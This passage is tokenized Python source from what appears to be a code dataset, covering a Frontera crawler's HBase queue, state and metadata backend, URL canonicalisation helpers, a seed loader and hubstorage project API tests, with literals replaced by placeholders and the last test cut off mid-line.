'<STR_LIT:f>' : { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> } } ) <EOL> def frontier_start ( self ) : <EOL> pass <EOL> def frontier_stop ( self ) : <EOL> pass <EOL> def schedule ( self , batch ) : <EOL> to_schedule = [ ] <EOL> for fprint , score , request , schedule in batch : <EOL> if schedule : <EOL> if '<STR_LIT>' not in request . meta : <EOL> _ , hostname , _ , _ , _ , _ = parse_domain_from_url_fast ( request . url ) <EOL> if not hostname : <EOL> self . logger . error ( "<STR_LIT>" % ( request . url , fprint ) ) <EOL> request . meta [ '<STR_LIT>' ] = { '<STR_LIT:name>' : hostname } <EOL> to_schedule . append ( ( score , fprint , request . meta [ '<STR_LIT>' ] , request . url ) ) <EOL> self . _schedule ( to_schedule ) <EOL> def _schedule ( self , batch ) : <EOL> """<STR_LIT>""" <EOL> def get_crc32 ( name ) : <EOL> return crc32 ( name ) if type ( name ) is str else crc32 ( name . encode ( '<STR_LIT:utf-8>' , '<STR_LIT:ignore>' ) ) <EOL> def get_interval ( score , resolution ) : <EOL> if score < <NUM_LIT:0.0> or score > <NUM_LIT:1.0> : <EOL> raise OverflowError <EOL> i = int ( score / resolution ) <EOL> if i % <NUM_LIT:10> == <NUM_LIT:0> and i > <NUM_LIT:0> : <EOL> i = i - <NUM_LIT:1> <EOL> return ( i * resolution , ( i + <NUM_LIT:1> ) * resolution ) <EOL> timestamp = int ( time ( ) * <NUM_LIT> ) <EOL> data = dict ( ) <EOL> for score , fingerprint , domain , url in batch : <EOL> if type ( domain ) == dict : <EOL> partition_id = self . partitioner . partition ( domain [ '<STR_LIT:name>' ] , self . partitions ) <EOL> host_crc32 = get_crc32 ( domain [ '<STR_LIT:name>' ] ) <EOL> elif type ( domain ) == int : <EOL> partition_id = self . partitioner . partition_by_hash ( domain , self . partitions ) <EOL> host_crc32 = domain <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> item = ( unhexlify ( fingerprint ) , host_crc32 , url , score ) <EOL> score = <NUM_LIT:1> - score <EOL> rk = "<STR_LIT>" % ( partition_id , "<STR_LIT>" % get_interval ( score , <NUM_LIT> ) , timestamp ) <EOL> data . setdefault ( rk , [ ] ) . append ( ( score , item ) ) <EOL> table = self . connection . table ( self . table_name ) <EOL> with table . batch ( transaction = True ) as b : <EOL> for rk , tuples in data . iteritems ( ) : <EOL> obj = dict ( ) <EOL> for score , item in tuples : <EOL> column = '<STR_LIT>' % get_interval ( score , <NUM_LIT> ) <EOL> obj . setdefault ( column , [ ] ) . append ( item ) <EOL> final = dict ( ) <EOL> packer = Packer ( ) <EOL> for column , items in obj . iteritems ( ) : <EOL> stream = BytesIO ( ) <EOL> for item in items : <EOL> stream . write ( packer . pack ( item ) ) <EOL> final [ column ] = stream . getvalue ( ) <EOL> b . put ( rk , final ) <EOL> def get_next_requests ( self , max_n_requests , partition_id , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> min_requests = kwargs . pop ( '<STR_LIT>' ) <EOL> min_hosts = kwargs . pop ( '<STR_LIT>' ) <EOL> max_requests_per_host = kwargs . pop ( '<STR_LIT>' ) <EOL> assert ( max_n_requests > min_requests ) <EOL> table = self . connection . table ( self . table_name ) <EOL> meta_map = { } <EOL> queue = { } <EOL> limit = min_requests <EOL> tries = <NUM_LIT:0> <EOL> count = <NUM_LIT:0> <EOL> while tries < self . GET_RETRIES : <EOL> tries += <NUM_LIT:1> <EOL> limit *= <NUM_LIT> if tries > <NUM_LIT:1> else <NUM_LIT:1.0> <EOL> self . logger . debug ( "<STR_LIT>" % ( tries , limit , count , len ( queue . keys ( ) ) ) ) <EOL> meta_map . clear ( ) <EOL> queue . clear ( ) <EOL> count = <NUM_LIT:0> <EOL> for rk , data in table . scan ( row_prefix = '<STR_LIT>' % partition_id , limit = int ( limit ) , batch_size = <NUM_LIT> ) : <EOL> for cq , buf in data . iteritems ( ) : <EOL> stream = BytesIO ( buf ) <EOL> unpacker = Unpacker ( stream ) <EOL> for item in unpacker : <EOL> fingerprint , host_crc32 , url , score = item <EOL> if host_crc32 not in queue : <EOL> queue [ host_crc32 ] = [ ] <EOL> if max_requests_per_host is not None and len ( queue [ host_crc32 ] ) > max_requests_per_host : <EOL> continue <EOL> queue [ host_crc32 ] . append ( fingerprint ) <EOL> count += <NUM_LIT:1> <EOL> if fingerprint not in meta_map : <EOL> meta_map [ fingerprint ] = [ ] <EOL> meta_map [ fingerprint ] . append ( ( rk , item ) ) <EOL> if count > max_n_requests : <EOL> break <EOL> if min_hosts is not None and len ( queue . keys ( ) ) < min_hosts : <EOL> continue <EOL> if count < min_requests : <EOL> continue <EOL> break <EOL> self . logger . debug ( "<STR_LIT>" % ( tries , len ( queue . keys ( ) ) , count ) ) <EOL> fprint_map = { } <EOL> for fprint , meta_list in meta_map . iteritems ( ) : <EOL> for rk , _ in meta_list : <EOL> fprint_map . setdefault ( rk , [ ] ) . append ( fprint ) <EOL> results = [ ] <EOL> trash_can = set ( ) <EOL> for _ , fprints in queue . iteritems ( ) : <EOL> for fprint in fprints : <EOL> for rk , _ in meta_map [ fprint ] : <EOL> if rk in trash_can : <EOL> continue <EOL> for rk_fprint in fprint_map [ rk ] : <EOL> _ , item = meta_map [ rk_fprint ] [ <NUM_LIT:0> ] <EOL> _ , _ , url , score = item <EOL> results . append ( Request ( url , meta = { <EOL> '<STR_LIT>' : hexlify ( rk_fprint ) , <EOL> '<STR_LIT>' : score , <EOL> } ) ) <EOL> trash_can . add ( rk ) <EOL> with table . batch ( transaction = True ) as b : <EOL> for rk in trash_can : <EOL> b . delete ( rk ) <EOL> self . logger . debug ( "<STR_LIT>" % ( len ( trash_can ) ) ) <EOL> return results <EOL> def count ( self ) : <EOL> return NotImplementedError <EOL> class HBaseState ( States ) : <EOL> def __init__ ( self , connection , table_name , logger , cache_size_limit ) : <EOL> self . connection = connection <EOL> self . _table_name = table_name <EOL> self . logger = logger <EOL> self . _state_cache = { } <EOL> self . _cache_size_limit = cache_size_limit <EOL> def update_cache ( self , objs ) : <EOL> objs = objs if type ( objs ) in [ list , tuple ] else [ objs ] <EOL> def put ( obj ) : <EOL> if obj . meta [ '<STR_LIT:state>' ] is not None : <EOL> self . _state_cache [ obj . meta [ '<STR_LIT>' ] ] = obj . meta [ '<STR_LIT:state>' ] <EOL> map ( put , objs ) <EOL> def set_states ( self , objs ) : <EOL> objs = objs if type ( objs ) in [ list , tuple ] else [ objs ] <EOL> def get ( obj ) : <EOL> fprint = obj . meta [ '<STR_LIT>' ] <EOL> obj . meta [ '<STR_LIT:state>' ] = self . _state_cache [ fprint ] if fprint in self . _state_cache else None <EOL> map ( get , objs ) <EOL> def flush ( self , force_clear ) : <EOL> if len ( self . _state_cache ) > self . _cache_size_limit : <EOL> force_clear = True <EOL> table = self . connection . table ( self . _table_name ) <EOL> for chunk in chunks ( self . _state_cache . items ( ) , <NUM_LIT> ) : <EOL> with table . batch ( transaction = True ) as b : <EOL> for fprint , state in chunk : <EOL> hb_obj = prepare_hbase_object ( state = state ) <EOL> b . put ( unhexlify ( fprint ) , hb_obj ) <EOL> if force_clear : <EOL> self . logger . debug ( "<STR_LIT>" % len ( self . _state_cache ) ) <EOL> self . _state_cache . clear ( ) <EOL> def fetch ( self , fingerprints ) : <EOL> to_fetch = [ f for f in fingerprints if f not in self . _state_cache ] <EOL> self . logger . debug ( "<STR_LIT>" % len ( self . _state_cache ) ) <EOL> self . logger . debug ( "<STR_LIT>" % ( len ( to_fetch ) , len ( fingerprints ) ) ) <EOL> for chunk in chunks ( to_fetch , <NUM_LIT> ) : <EOL> keys = [ unhexlify ( fprint ) for fprint in chunk ] <EOL> table = self . connection . table ( self . _table_name ) <EOL> records = table . rows ( keys , columns = [ '<STR_LIT>' ] ) <EOL> for key , cells in records : <EOL> if '<STR_LIT>' in cells : <EOL> state = unpack ( '<STR_LIT>' , cells [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> self . _state_cache [ hexlify ( key ) ] = state <EOL> class HBaseMetadata ( Metadata ) : <EOL> def __init__ ( self , connection , table_name , drop_all_tables , use_snappy , batch_size , store_content ) : <EOL> self . _table_name = table_name <EOL> tables = set ( connection . tables ( ) ) <EOL> if drop_all_tables and self . _table_name in tables : <EOL> connection . delete_table ( self . _table_name , disable = True ) <EOL> tables . remove ( self . _table_name ) <EOL> if self . _table_name not in tables : <EOL> schema = { '<STR_LIT:m>' : { '<STR_LIT>' : <NUM_LIT:1> } , <EOL> '<STR_LIT:s>' : { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : True , } , <EOL> '<STR_LIT:c>' : { '<STR_LIT>' : <NUM_LIT:1> } <EOL> } <EOL> if use_snappy : <EOL> schema [ '<STR_LIT:m>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> schema [ '<STR_LIT:c>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> connection . create_table ( self . _table_name , schema ) <EOL> table = connection . table ( self . _table_name ) <EOL> self . batch = table . batch ( batch_size = batch_size ) <EOL> self . store_content = store_content <EOL> def frontier_start ( self ) : <EOL> pass <EOL> def frontier_stop ( self ) : <EOL> self . flush ( ) <EOL> def flush ( self ) : <EOL> self . batch . send ( ) <EOL> def add_seeds ( self , seeds ) : <EOL> for seed in seeds : <EOL> obj = prepare_hbase_object ( url = seed . url , <EOL> depth = <NUM_LIT:0> , <EOL> created_at = utcnow_timestamp ( ) , <EOL> domain_fingerprint = seed . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> self . batch . put ( unhexlify ( seed . meta [ '<STR_LIT>' ] ) , obj ) <EOL> def page_crawled ( self , response , links ) : <EOL> obj = prepare_hbase_object ( status_code = response . status_code , content = response . body ) if self . store_content else prepare_hbase_object ( status_code = response . status_code ) <EOL> links_dict = dict ( ) <EOL> for link in links : <EOL> links_dict [ unhexlify ( link . meta [ '<STR_LIT>' ] ) ] = ( link , link . url , link . meta [ '<STR_LIT>' ] ) <EOL> self . batch . put ( unhexlify ( response . meta [ '<STR_LIT>' ] ) , obj ) <EOL> for link_fingerprint , ( link , link_url , link_domain ) in links_dict . iteritems ( ) : <EOL> obj = prepare_hbase_object ( url = link_url , <EOL> created_at = utcnow_timestamp ( ) , <EOL> domain_fingerprint = link_domain [ '<STR_LIT>' ] ) <EOL> self . batch . put ( link_fingerprint , obj ) <EOL> def request_error ( self , request , error ) : <EOL> obj = prepare_hbase_object ( url = request . url , <EOL> created_at = utcnow_timestamp ( ) , <EOL> error = error , <EOL> domain_fingerprint = request . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> rk = unhexlify ( request . meta [ '<STR_LIT>' ] ) <EOL> self . batch . put ( rk , obj ) <EOL> def update_score ( self , batch ) : <EOL> if not isinstance ( batch , dict ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> for fprint , ( score , url , schedule ) in batch . iteritems ( ) : <EOL> obj = prepare_hbase_object ( score = score ) <EOL> rk = unhexlify ( fprint ) <EOL> self . batch . put ( rk , obj ) <EOL> class HBaseBackend ( DistributedBackend ) : <EOL> component_name = '<STR_LIT>' <EOL> def __init__ ( self , manager ) : <EOL> self . manager = manager <EOL> self . logger = manager . logger . backend <EOL> settings = manager . settings <EOL> port = settings . get ( '<STR_LIT>' ) <EOL> hosts = settings . get ( '<STR_LIT>' ) <EOL> namespace = settings . get ( '<STR_LIT>' ) <EOL> self . queue_partitions = settings . get ( '<STR_LIT>' ) <EOL> host = choice ( hosts ) if type ( hosts ) in [ list , tuple ] else hosts <EOL> kwargs = { <EOL> '<STR_LIT:host>' : host , <EOL> '<STR_LIT:port>' : int ( port ) , <EOL> '<STR_LIT>' : namespace , <EOL> '<STR_LIT>' : '<STR_LIT::>' <EOL> } <EOL> if settings . get ( '<STR_LIT>' ) : <EOL> kwargs . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> self . connection = Connection ( ** kwargs ) <EOL> self . _metadata = None <EOL> self . _queue = None <EOL> self . _states = None <EOL> @ classmethod <EOL> def strategy_worker ( cls , manager ) : <EOL> o = cls ( manager ) <EOL> settings = manager . settings <EOL> o . _states = HBaseState ( o . connection , settings . get ( '<STR_LIT>' ) , o . manager . logger . backend , <EOL> settings . get ( '<STR_LIT>' ) ) <EOL> return o <EOL> @ classmethod <EOL> def db_worker ( cls , manager ) : <EOL> o = cls ( manager ) <EOL> settings = manager . settings <EOL> drop_all_tables = settings . get ( '<STR_LIT>' ) <EOL> o . _queue = HBaseQueue ( o . connection , o . queue_partitions , o . manager . logger . backend , <EOL> settings . get ( '<STR_LIT>' ) , drop = drop_all_tables ) <EOL> o . _metadata = HBaseMetadata ( o . connection , settings . get ( '<STR_LIT>' ) , drop_all_tables , <EOL> settings . get ( '<STR_LIT>' ) , settings . get ( '<STR_LIT>' ) , <EOL> settings . get ( '<STR_LIT>' ) ) <EOL> return o <EOL> @ property <EOL> def metadata ( self ) : <EOL> return self . _metadata <EOL> @ property <EOL> def queue ( self ) : <EOL> return self . _queue <EOL> @ property <EOL> def states ( self ) : <EOL> return self . _states <EOL> def frontier_start ( self ) : <EOL> for component in [ self . metadata , self . queue , self . states ] : <EOL> if component : <EOL> component . frontier_start ( ) <EOL> def frontier_stop ( self ) : <EOL> for component in [ self . metadata , self . queue , self . states ] : <EOL> if component : <EOL> component . frontier_stop ( ) <EOL> self . connection . close ( ) <EOL> def add_seeds ( self , seeds ) : <EOL> self . metadata . add_seeds ( seeds ) <EOL> def page_crawled ( self , response , links ) : <EOL> self . metadata . page_crawled ( response , links ) <EOL> def request_error ( self , page , error ) : <EOL> self . metadata . request_error ( page , error ) <EOL> def finished ( self ) : <EOL> raise NotImplementedError <EOL> def get_next_requests ( self , max_next_requests , ** kwargs ) : <EOL> next_pages = [ ] <EOL> self . logger . debug ( "<STR_LIT>" ) <EOL> partitions = set ( kwargs . pop ( '<STR_LIT>' , [ ] ) ) <EOL> for partition_id in range ( <NUM_LIT:0> , self . queue_partitions ) : <EOL> if partition_id not in partitions : <EOL> continue <EOL> results = self . queue . get_next_requests ( max_next_requests , partition_id , min_requests = <NUM_LIT:64> , <EOL> min_hosts = <NUM_LIT> , max_requests_per_host = <NUM_LIT> ) <EOL> next_pages . extend ( results ) <EOL> self . logger . debug ( "<STR_LIT>" % ( len ( results ) , partition_id ) ) <EOL> return next_pages </s>
<s> import codecs <EOL> from scrapy . exceptions import NotConfigured <EOL> from frontera . contrib . scrapy . middlewares . seeds import SeedLoader <EOL> class FileSeedLoader ( SeedLoader ) : <EOL> def configure ( self , settings ) : <EOL> self . seeds_source = settings . get ( '<STR_LIT>' ) <EOL> if not self . seeds_source : <EOL> raise NotConfigured <EOL> def load_seeds ( self ) : <EOL> return self . load_seeds_from_file ( self . seeds_source ) <EOL> def load_seeds_from_file ( self , file_path ) : <EOL> with codecs . open ( file_path , '<STR_LIT>' ) as f : <EOL> return self . load_seeds_from_data ( ( f ) ) <EOL> def load_seeds_from_data ( self , data ) : <EOL> seeds = [ ] <EOL> for seed in data : <EOL> clean_seed = self . clean_seed ( seed ) <EOL> if clean_seed : <EOL> seeds . append ( clean_seed ) <EOL> return seeds <EOL> def clean_seed ( self , url ) : <EOL> return url . strip ( '<STR_LIT>' ) </s>
<s> from frontera . contrib . canonicalsolvers import Basic <EOL> from frontera . core . models import Request , Response <EOL> def test_basic ( ) : <EOL> cs = Basic ( ) <EOL> r = Request ( url = "<STR_LIT>" ) <EOL> re = Response ( url = "<STR_LIT>" , request = r ) <EOL> re . meta [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> re . meta [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> re . meta [ '<STR_LIT>' ] = [ "<STR_LIT>" ] <EOL> cs . page_crawled ( re , [ ] ) <EOL> assert re . url == "<STR_LIT>" </s>
<s> import urlparse <EOL> import urllib <EOL> import cgi <EOL> import hashlib <EOL> from six import moves <EOL> from w3lib . util import unicode_to_str <EOL> _ALWAYS_SAFE_BYTES = ( b'<STR_LIT>' <EOL> b'<STR_LIT>' <EOL> b'<STR_LIT>' b'<STR_LIT>' ) <EOL> _reserved = b'<STR_LIT>' <EOL> _unreserved_marks = b"<STR_LIT>" <EOL> _safe_chars = _ALWAYS_SAFE_BYTES + b'<STR_LIT:%>' + _reserved + _unreserved_marks <EOL> def parse_url ( url , encoding = None ) : <EOL> """<STR_LIT>""" <EOL> return url if isinstance ( url , urlparse . ParseResult ) else urlparse . urlparse ( unicode_to_str ( url , encoding ) ) <EOL> def parse_domain_from_url ( url ) : <EOL> """<STR_LIT>""" <EOL> import tldextract <EOL> extracted = tldextract . extract ( url ) <EOL> scheme , _ , _ , _ , _ , _ = parse_url ( url ) <EOL> sld = extracted . domain <EOL> tld = extracted . suffix <EOL> subdomain = extracted . subdomain <EOL> name = '<STR_LIT:.>' . join ( [ sld , tld ] ) if tld else sld <EOL> netloc = '<STR_LIT:.>' . join ( [ subdomain , name ] ) if subdomain else name <EOL> return netloc , name , scheme , sld , tld , subdomain <EOL> def parse_domain_from_url_fast ( url ) : <EOL> """<STR_LIT>""" <EOL> result = parse_url ( url ) <EOL> return result . netloc , result . hostname , result . scheme , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" <EOL> def safe_url_string ( url , encoding = '<STR_LIT:utf8>' ) : <EOL> """<STR_LIT>""" <EOL> s = unicode_to_str ( url , encoding ) <EOL> return moves . urllib . parse . quote ( s , _safe_chars ) <EOL> def _unquotepath ( path ) : <EOL> for reserved in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> path = path . replace ( '<STR_LIT:%>' + reserved , '<STR_LIT>' + reserved . upper ( ) ) <EOL> return urllib . unquote ( path ) <EOL> def canonicalize_url ( url , keep_blank_values = True , keep_fragments = False ) : <EOL> """<STR_LIT>""" <EOL> scheme , netloc , path , params , query , fragment = parse_url ( url ) <EOL> keyvals = cgi . parse_qsl ( query , keep_blank_values ) <EOL> keyvals . sort ( ) <EOL> query = urllib . urlencode ( keyvals ) <EOL> path = safe_url_string ( _unquotepath ( path ) ) or '<STR_LIT:/>' <EOL> fragment = '<STR_LIT>' if not keep_fragments else fragment <EOL> return urlparse . urlunparse ( ( scheme , netloc . lower ( ) , path , params , query , fragment ) ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> from random import randint , random <EOL> from requests . exceptions import HTTPError <EOL> from hubstorage import HubstorageClient <EOL> from hubstorage . utils import millitime <EOL> from hstestcase import HSTestCase <EOL> from testutil import failing_downloader <EOL> class ProjectTest ( HSTestCase ) : <EOL> def test_projectid ( self ) : <EOL> p1 = self . hsclient . get_project ( int ( self . projectid ) ) <EOL> p2 = self . hsclient . get_project ( str ( self . projectid ) ) <EOL> self . assertEqual ( p1 . projectid , p2 . projectid ) <EOL> self . assertEqual ( type ( p1 . projectid ) , str ) <EOL> self . assertEqual ( type ( p2 . projectid ) , str ) <EOL> self . assertRaises ( AssertionError , self . hsclient . get_project , '<STR_LIT>' ) <EOL> def test_get_job_from_key ( self ) : <EOL> job = self . project . push_job ( self . spidername ) <EOL> parts = tuple ( job . key . split ( '<STR_LIT:/>' ) ) <EOL> self . assertEqual ( len ( parts ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( parts [ : <NUM_LIT:2> ] , ( self . projectid , self . spiderid ) ) <EOL> samejob1 = self . hsclient . get_job ( job . key ) <EOL> samejob2 = self . project . get_job ( job . key ) <EOL> samejob3 = self . project . get_job ( parts [ <NUM_LIT:1> : ] ) <EOL> self . assertEqual ( samejob1 . key , job . key ) <EOL> self . assertEqual ( samejob2 . key , job . key ) <EOL> self . assertEqual ( samejob3 . key , job . key ) <EOL> def test_get_jobs ( self ) : <EOL> p = self . project <EOL> j1 = p . push_job ( self . spidername , testid = <NUM_LIT:0> ) <EOL> j2 = p . push_job ( self . spidername , testid = <NUM_LIT:1> ) <EOL> j3 = p . push_job ( self . spidername , testid = <NUM_LIT:2> ) <EOL> self . assertTrue ( list ( p . get_jobs ( count = <NUM_LIT:1> , state = '<STR_LIT>' ) ) ) <EOL> r = list ( p . get_jobs ( spider = self . spidername , state = '<STR_LIT>' ) ) <EOL> self . assertEqual ( [ j . key for j in r ] , [ j3 . key , j2 . key , j1 . key ] ) <EOL> def test_get_jobs_with_legacy_filter ( self ) : <EOL> p = self . project <EOL> j1 = p . push_job ( self . spidername , state = '<STR_LIT>' , <EOL> close_reason = '<STR_LIT>' , tags = [ '<STR_LIT>' ] ) <EOL> j2 = p . push_job ( self . spidername , state = '<STR_LIT>' , <EOL> close_reason = '<STR_LIT>' , tags = [ '<STR_LIT>' ] ) <EOL> j3 = p . push_job ( self . spidername , state = '<STR_LIT>' ) <EOL> j4 = p . push_job ( self . spidername , state = '<STR_LIT>' , <EOL> close_reason = '<STR_LIT>' , tags = [ '<STR_LIT>' ] ) <EOL> j5 = p . push_job ( self . spidername + '<STR_LIT>' , state = '<STR_LIT>' , <EOL> close_reason = '<STR_LIT>' , tags = [ '<STR_LIT>' ] ) <EOL> filters = [ [ '<STR_LIT>' , '<STR_LIT:=>' , [ self . spidername ] ] , <EOL> [ '<STR_LIT:state>' , '<STR_LIT:=>' , [ '<STR_LIT>' ] ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:=>' , [ '<STR_LIT>' ] ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT>' ] ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT>' ] ] ] <EOL> jobs = p . get_jobs ( filter = [ json . dumps ( x ) for x in filters ] ) <EOL> assert [ j . key for j in jobs ] == [ j2 . key ] , jobs <EOL> def test_push_job ( self ) : <EOL> job = self . project . push_job ( self . spidername , state = '<STR_LIT>' , <EOL> priority = self . project . jobq . PRIO_HIGH , <EOL> foo = u'<STR_LIT:bar>' ) <EOL> self . assertEqual ( job . metadata . get ( '<STR_LIT:state>' ) , u'<STR_LIT>' ) <EOL> self . assertEqual ( job . metadata . get ( '<STR_LIT:foo>' ) , u'<STR_LIT:bar>' ) <EOL> self . project . jobq . finish ( job ) <EOL> self . project . jobq . delete ( job ) <EOL> job . metadata . expire ( ) <EOL> self . assertEqual ( job . metadata . get ( '<STR_LIT:state>' ) , u'<STR_LIT>' ) <EOL> self . assertEqual ( job . metadata . get ( '<STR_LIT:foo>' ) , u'<STR_LIT:bar>' ) <EOL> def test_auth ( self ) : <EOL> hsc = HubstorageClient ( endpoint = self . hsclient . endpoint ) <EOL> self . assertEqual ( hsc . auth , None ) <EOL> try : <EOL> hsc . push_job ( self . projectid , self . spidername ) <EOL> except HTTPError as exc : <EOL> self . assertTrue ( exc . response . status_code , <NUM_LIT> ) <EOL> else : <EOL> self . assertTrue ( False , '<STR_LIT>' ) <EOL> try : <EOL> hsc . get_project ( self . projectid ) . push_job ( self . spidername ) <EOL> except HTTPError as exc : <EOL> self . assertTrue ( exc . response . status_code , <NUM_LIT> ) <EOL> else : <EOL> self . assertTrue ( False , '<STR_LIT>' ) <EOL> try : <EOL> hsc . get_job ( ( self . projectid , <NUM_LIT:1> , <NUM_LIT:1> ) ) . items . list ( ) <EOL> except HTTPError as exc : <EOL> self . assertTrue ( exc . response . status_code , <NUM_LIT> ) <EOL> else : <EOL> self . assertTrue ( False , '<STR_LIT>' ) <EOL> try : <EOL> hsc . get_project ( self . projectid ) . get_job ( ( self . projectid , <NUM_LIT:1> , <NUM_LIT:1> ) ) . items . list ( ) <EOL> except HTTPError as exc : <EOL> self . assertTrue ( exc . response . status_code , <NUM_LIT> ) <EOL> else : <EOL> self . assertTrue ( False , '<STR_LIT>' ) <EOL> auth = self . hsclient . auth <EOL> project = hsc . get_project ( self . projectid , auth ) <EOL> self . assertEqual ( project . auth , auth ) <EOL> job = project . push_job ( self . spidername ) <EOL> samejob = project . get_job ( job . key ) <EOL> self . assertEqual ( samejob . key , job . key ) <EOL> def test_broad ( self ) : <EOL> project = self . hsclient . get_project ( self . projectid ) <EOL> job = project . push_job ( self . spidername ) <EOL> self . assertEqual ( job . metadata . get ( '<STR_LIT:state>' ) , '<STR_LIT>' ) <EOL> job = self . start_job ( ) <EOL> self . assertEqual ( job . metadata . get ( '<STR_LIT:state>' ) , '<STR_LIT>' ) <EOL> job . items . write ( { '<STR_LIT:title>' : '<STR_LIT:bar>' } ) <EOL> job . logs . info ( '<STR_LIT>' ) <EOL> job . samples . write ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> job . close_writers ( ) <EOL> job . jobq . finish ( job ) <EOL> jobid = job . key <EOL> jobauth = job . auth <EOL> del job <EOL> self . assertTrue ( list ( project . items . list ( self . spiderid , count = <NUM_LIT:1> ) ) ) <EOL> self . assertTrue ( list ( project . logs . list ( self . spiderid , count = <NUM_LIT:1> ) ) ) <EOL> self . assertTrue ( list ( project . samples . list ( self . spiderid , count = <NUM_LIT:1> ) ) ) <EOL> job = project . client . get_job ( jobid , jobauth = jobauth ) <EOL> job . purged ( ) <EOL> def test_settings ( self ) : <EOL> project = self . hsclient . get_project ( self . projectid ) <EOL> settings = dict ( project . settings ) <EOL> settings . pop ( '<STR_LIT>' , None ) <EOL> self . assertEqual ( settings , { } ) <EOL> project . settings [ '<STR_LIT>' ] = created = millitime ( ) <EOL> project . settings [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> project . settings . save ( ) <EOL> self . assertEqual ( project . settings . liveget ( '<STR_LIT>' ) , created ) <EOL> self . assertEqual ( project . settings . liveget ( '<STR_LIT>' ) , [ '<STR_LIT>' ] ) <EOL> project . settings . expire ( ) <EOL> self . assertEqual ( dict ( project . settings ) , { <EOL> '<STR_LIT>' : created , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> } ) <EOL> def test_requests ( self ) : <EOL> ts = millitime ( ) <EOL> job = self . project . push_job ( self . spidername , state = '<STR_LIT>' ) <EOL> r1 = job . requests . add ( url = '<STR_LIT>' , status = <NUM_LIT:200> , method = '<STR_LIT:GET>' , <EOL> rs = <NUM_LIT> , duration = <NUM_LIT:5> , parent = None , ts = ts ) <EOL> r2 = job . requests . add ( url = '<STR_LIT>' , status = <NUM_LIT> , method = '<STR_LIT:POST>' , <EOL> rs = <NUM_LIT:0> , duration = <NUM_LIT:1> , parent = r1 , ts = ts + <NUM_LIT:1> ) <EOL> r3 = job . requests . add ( url = '<STR_LIT>' , status = <NUM_LIT> , method = '<STR_LIT>' , <EOL> rs = <NUM_LIT:0> , duration = <NUM_LIT:1> , parent = r1 , ts = ts + <NUM_LIT:2> , fp = '<STR_LIT>' ) <EOL> job . requests . close ( ) <EOL> rr = job . requests . list ( ) <EOL> self . assertEqual ( rr . next ( ) , <EOL> { u'<STR_LIT:status>' : <NUM_LIT:200> , u'<STR_LIT>' : <NUM_LIT> , <EOL> u'<STR_LIT:url>' : u'<STR_LIT>' , u'<STR_LIT:time>' : ts , <EOL> u'<STR_LIT>' : <NUM_LIT:5> , u'<STR_LIT>' : u'<STR_LIT:GET>' } ) <EOL> self . assertEqual ( rr . next ( ) , <EOL> { u'<STR_LIT:status>' : <NUM_LIT> , u'<STR_LIT>' : <NUM_LIT:0> , u'<STR_LIT>' : <NUM_LIT:0> , <EOL> u'<STR_LIT:url>' : u'<STR_LIT>' , u'<STR_LIT:time>' : ts + <NUM_LIT:1> , <EOL> u'<STR_LIT>' : <NUM_LIT:1> , u'<STR_LIT>' : u'<STR_LIT:POST>' } ) <EOL> self . assertEqual ( rr . next ( ) , <EOL> { u'<STR_LIT:status>' : <NUM_LIT> , u'<STR_LIT>' : u'<STR_LIT>' , u'<STR_LIT>' : <NUM_LIT:0> , <EOL> u'<STR_LIT>' : <NUM_LIT:0> , u'<STR_LIT:url>' : u'<STR_LIT>' , <EOL> u'<STR_LIT:time>' : ts + <NUM_LIT:2> , u'<STR_LIT>' : <NUM_LIT:1> , <EOL> u'<STR_LIT>' : u'<STR_LIT>' } ) <EOL> self . assertRaises ( StopIteration , rr . next ) <EOL> def test_samples ( self ) : <EOL> j1 = self . project . push_job ( self . spidername , state = '<STR_LIT>' ) <EOL> self . assertEqual ( list ( j1 . samples . list ( ) ) , [ ] ) <EOL> ts = millitime ( ) <EOL> j1 . samples . write ( [ ts , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> j1 . samples . write ( [ ts + <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:9> , <NUM_LIT:4> ] ) <EOL> j1 . samples . flush ( ) <EOL> o = list ( j1 . samples . list ( ) ) <EOL> self . assertEqual ( len ( o ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( o [ <NUM_LIT:0> ] , [ ts , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> self . assertEqual ( o [ <NUM_LIT:1> ] , [ ts + <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:9> , <NUM_LIT:4> ] ) <EOL> j2 = self . project . push_job ( self . spidername , state = '<STR_LIT>' ) <EOL> samples = [ ] <EOL> ts = millitime ( ) <EOL> count = int ( j2 . samples . batch_size * ( random ( ) + randint ( <NUM_LIT:1> , <NUM_LIT:5> ) ) ) <EOL> for _ in xrange ( count ) : <EOL> ts += randint ( <NUM_LIT:1> , <NUM_LIT:2> ** <NUM_LIT:16> ) <EOL> row = [ ts ] + list ( randint ( <NUM_LIT:0> , <NUM_LIT:2> ** <NUM_LIT:16> ) for _ in xrange ( randint ( <NUM_LIT:0> , 